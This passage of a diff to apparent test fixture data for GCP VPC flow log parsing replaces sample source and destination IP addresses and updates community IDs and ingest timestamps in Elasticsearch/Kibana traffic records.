"{\"insertId\":\"bnj3cofh3cdkh\",\"jsonPayload\":{\"bytes_sent\":\"18295\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33858},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789039435Z\",\"packets_sent\":\"118\",\"reporter\":\"DEST\",\"rtt_msec\":\"253\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458515996Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391503Z", + "original": "{\"insertId\":\"bnj3cofh3cdkh\",\"jsonPayload\":{\"bytes_sent\":\"18295\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33858},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789039435Z\",\"packets_sent\":\"118\",\"reporter\":\"DEST\",\"rtt_msec\":\"253\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458515996Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458515996Z", "end": "2019-06-14T03:49:51.789039435Z", @@ -6466,17 +6466,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 33064, "bytes": 1467, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:aT1tuR31uByuIcuxfCbs1kvMBMA=", + "community_id": "1:1YXDYMIDmqablN3iIS5sgm7U7jU=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -6490,7 +6490,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, @@ -6515,8 +6515,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868651600Z", - "original": "{\"insertId\":\"bnj3cofh3cdkg\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":33064},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391508400Z", + "original": "{\"insertId\":\"bnj3cofh3cdkg\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33064},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:44:40.125336665Z", "end": "2019-06-14T03:44:40.243022993Z", @@ -6543,18 +6543,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 165290, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 251 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:88xKud9UZj+uL0CBL+jvBleTFIk=", + "community_id": "1:xlc9p+qqPBlTtvXaxYaz5GAWNls=", "bytes": 165290, "name": "default", "transport": "tcp", @@ -6576,7 +6576,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -6613,8 +6613,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868654800Z", - "original": "{\"insertId\":\"bnj3cofh3cdk7\",\"jsonPayload\":{\"bytes_sent\":\"165290\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33556,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391514300Z", + "original": "{\"insertId\":\"bnj3cofh3cdk7\",\"jsonPayload\":{\"bytes_sent\":\"165290\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33556,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:59.565335113Z", @@ -6641,17 +6641,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 53706, "bytes": 1458, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:0BGh5oABRy6JrttDfTSBw1iBDW4=", + "community_id": "1:FnUL58e/2lopFxzyH6NB4ZfRZYg=", "bytes": 1458, "transport": "tcp", "type": "ipv4", @@ -6665,7 +6665,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, @@ -6690,8 +6690,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868657900Z", - "original": "{\"insertId\":\"bnj3cofh3cdk9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":53706},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"43\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391519800Z", + "original": "{\"insertId\":\"bnj3cofh3cdk9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53706},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"43\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:43:50.703302550Z", "end": "2019-06-14T03:43:50.822333871Z", @@ -6718,17 +6718,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 52260, "bytes": 1464, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:MlFaFjbkXS6KKyiSbXcNDQJbn8U=", + "community_id": "1:jQQ6l4o1MZQiUFoVCT++dIYahM8=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -6742,7 +6742,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, @@ -6767,8 +6767,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868661100Z", - "original": "{\"insertId\":\"bnj3cofh3cdkj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":52260},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391525200Z", + "original": "{\"insertId\":\"bnj3cofh3cdkj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":52260},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:42:11.063146265Z", "end": "2019-06-14T03:42:11.183868408Z", @@ -6789,9 +6789,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 34090, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -6805,7 +6805,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Tx2SSXIplYZjqzTurpvVWc2USh0=", + "community_id": "1:r0YXIwQbyBtxc4laQWML5QBB+Tw=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -6820,7 +6820,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { @@ -6844,8 +6844,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868664300Z", - "original": "{\"insertId\":\"bnj3cofh3cdki\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":34090,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391530600Z", + "original": "{\"insertId\":\"bnj3cofh3cdki\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34090,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:46:37.712749588Z", "end": "2019-06-14T03:46:37.827345444Z", @@ -6866,9 +6866,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 34178, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -6882,7 +6882,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bh7TlqiDrY8ste65CJNAKtfwOT0=", + "community_id": "1:ZAwMkhzg8iPFTne4VZtPZ10WSQw=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -6897,7 +6897,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { @@ -6921,8 +6921,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868667300Z", - "original": "{\"insertId\":\"bnj3cofh3cdkd\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":34178,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391536100Z", + "original": "{\"insertId\":\"bnj3cofh3cdkd\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34178,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:46:51.237256499Z", "end": "2019-06-14T03:46:51.355687385Z", @@ -6943,9 +6943,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 33064, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -6959,7 +6959,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:aT1tuR31uByuIcuxfCbs1kvMBMA=", + "community_id": "1:1YXDYMIDmqablN3iIS5sgm7U7jU=", "bytes": 1776, "transport": "tcp", "type": "ipv4", @@ -6974,7 +6974,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { @@ -6998,8 +6998,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868670400Z", - "original": "{\"insertId\":\"bnj3cofh3cdjw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":33064,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391541500Z", + "original": "{\"insertId\":\"bnj3cofh3cdjw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33064,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:44:40.125336665Z", "end": "2019-06-14T03:44:40.243022993Z", @@ -7026,17 +7026,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 34906, "bytes": 1461, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:jbQzsE/elxbdsdcfLH3Z+WY7yoA=", + "community_id": "1:w9XiZoaEVIGVzEG0jduGM1uQWNw=", "bytes": 1461, "transport": "tcp", "type": "ipv4", @@ -7050,7 +7050,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, @@ -7075,8 +7075,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868673500Z", - "original": "{\"insertId\":\"bnj3cofh3cdk3\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":34906},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391547Z", + "original": "{\"insertId\":\"bnj3cofh3cdk3\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":34906},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetw